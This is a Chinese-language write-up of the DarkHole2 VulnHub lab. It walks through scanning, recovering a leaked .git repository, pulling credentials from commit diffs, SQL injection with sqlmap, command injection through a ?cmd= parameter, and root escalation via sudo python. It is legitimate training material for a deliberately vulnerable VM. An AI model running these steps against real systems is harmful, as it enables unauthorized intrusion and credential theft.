DarkHole2
前言
靶场地址:
https://download.vulnhub.com/darkhole/darkhole_2.zip
信息收集
主机发现
1 | ifconfig |
端口扫描
1 | nmap -sS -Pn 192.168.10.5 |
目录扫描
1 | dirsearch -u 192.168.10.5 |
目录扫描发现存在.git文件泄露
渗透测试
1 | pip install git-dumper |
从.git还原的文件里面发现config/config.php内泄露了数据库的连接参数
1 |
|
查看提交日志
1 | git log |
1 | git diff a4d900a8d85e8938d3601f3cef113ee293028e10 |
发现登录web的用户名密码为 lush@admin.com 321
登录成功的页面如下
尝试sql注入
1 | sqlmap -u http://192.168.10.5/dashboard.php?id=1 --cookie PHPSESSID=imrmmathkno9gqo2psff6vc3hp --dump |
拿到ssh用户名jehad
,密码fool
查看历史命令
1 | cat .bash_history |
推测http://127.0.01:9999/?cmd= 存在命令执行漏洞
1 | curl "http://localhost:9999?cmd=whoami" |
尝试反弹shell(实测没成功)
1 | curl "http://localhost:9999?cmd=ls%20-a%20~" #列出家目录的所有文件 |
发现家目录也有一个.bash_history
文件,查看文件内容
1 | curl "http://localhost:9999/?cmd=cat%20~/.bash_history" |
看到一组用户名密码 losy:gang
ssh成功登录losy用户
sudo -l
看到losy可以以root权限运行python
python提权
1 | sudo /usr/bin/python3 -c "import pty;pty.spawn('/bin/bash')" |